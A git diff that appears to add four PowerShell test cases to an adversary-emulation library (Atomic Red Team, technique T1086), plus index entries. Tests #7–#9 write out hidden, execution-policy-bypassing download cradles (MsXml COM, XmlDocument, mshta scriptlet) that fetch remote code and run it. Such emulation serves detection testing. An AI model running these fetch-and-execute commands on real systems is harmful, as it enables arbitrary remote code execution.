diff --git a/atomics/T1086/T1086.md b/atomics/T1086/T1086.md
index 8cf132dd..fff2ae14 100644
--- a/atomics/T1086/T1086.md
+++ b/atomics/T1086/T1086.md
@@ -34,6 +34,14 @@ Remote Support: Yes
- [Atomic Test #6 - PowerShell Add User](#atomic-test-6---powershell-add-user)
+- [Atomic Test #7 - Powershell MsXml COM object](#atomic-test-7---powershell-msxml-com-object)
+
+- [Atomic Test #8 - Powershell XML requests](#atomic-test-8---powershell-xml-requests)
+
+- [Atomic Test #9 - Powershell invoke mshta.exe download](#atomic-test-9---powershell-invoke-mshtaexe-download)
+
+- [Atomic Test #10 - Powershell Invoke-DownloadCradle](#atomic-test-10---powershell-invoke-downloadcradle)
+
@@ -142,3 +150,76 @@ Using PS 5.1, add a user via CLI
New-LocalUser -FullName '${full_name}' -Name '${user_name}' -Password ${password} ‑Description '${description}'
```
+
+
+## Atomic Test #7 - Powershell MsXml COM object
+Provided by https://github.com/mgreen27/mgreen27.github.io
+Powershell MsXml COM object.
+Not proxy aware removing cache although does not appear to write to those locations
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1|
+
+#### Run it with `powershell`!
+```
+powershell.exe -exec bypass -windowstyle hidden -noprofile “$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open(‘GET’,’${url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText”
+```
+
+
+
+## Atomic Test #8 - Powershell XML requests
+Provided by https://github.com/mgreen27/mgreen27.github.io
+Powershell xml download request
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.xml|
+
+#### Run it with `powershell`!
+```
+"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -windowstyle hidden -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('${url}');$Xml.command.a.execute | IEX"
+```
+
+
+
+## Atomic Test #9 - Powershell invoke mshta.exe download
+Provided by https://github.com/mgreen27/mgreen27.github.io
+Powershell invoke mshta to download payload
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/mshta.sct|
+
+#### Run it with `powershell`!
+```
+"C:\Windows\system32\cmd.exe" /c "mshta.exe javascript:a=GetObject("script:${url}").Exec();close()"
+```
+
+
+
+## Atomic Test #10 - Powershell Invoke-DownloadCradle
+Provided by https://github.com/mgreen27/mgreen27.github.io
+Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
+
+**Supported Platforms:** Windows
+
+
+#### Run it with these steps!
+1. Open Powershell_ise as a Privileged Account
+2. Invoke-DownloadCradle.ps1
+
+
+
diff --git a/atomics/index.md b/atomics/index.md
index 75670230..61ab9c2f 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -454,6 +454,10 @@
- Atomic Test #4: Mimikatz - Cradlecraft PsSendKeys [windows]
- Atomic Test #5: Invoke-AppPathBypass [windows]
- Atomic Test #6: PowerShell Add User [windows]
+ - Atomic Test #7: Powershell MsXml COM object [windows]
+ - Atomic Test #8: Powershell XML requests [windows]
+ - Atomic Test #9: Powershell invoke mshta.exe download [windows]
+ - Atomic Test #10: Powershell Invoke-DownloadCradle [windows]
- [T1121 Regsvcs/Regasm](./T1121/T1121.md)
- Atomic Test #1: Regasm Uninstall Method Call Test [windows]
- Atomic Test #2: Regsvs Uninstall Method Call Test [windows]
diff --git a/atomics/windows-index.md b/atomics/windows-index.md
index d266deb2..83d3cdbf 100644
--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -374,6 +374,10 @@
- Atomic Test #4: Mimikatz - Cradlecraft PsSendKeys [windows]
- Atomic Test #5: Invoke-AppPathBypass [windows]
- Atomic Test #6: PowerShell Add User [windows]
+ - Atomic Test #7: Powershell MsXml COM object [windows]
+ - Atomic Test #8: Powershell XML requests [windows]
+ - Atomic Test #9: Powershell invoke mshta.exe download [windows]
+ - Atomic Test #10: Powershell Invoke-DownloadCradle [windows]
- [T1121 Regsvcs/Regasm](./T1121/T1121.md)
- Atomic Test #1: Regasm Uninstall Method Call Test [windows]
- Atomic Test #2: Regsvs Uninstall Method Call Test [windows]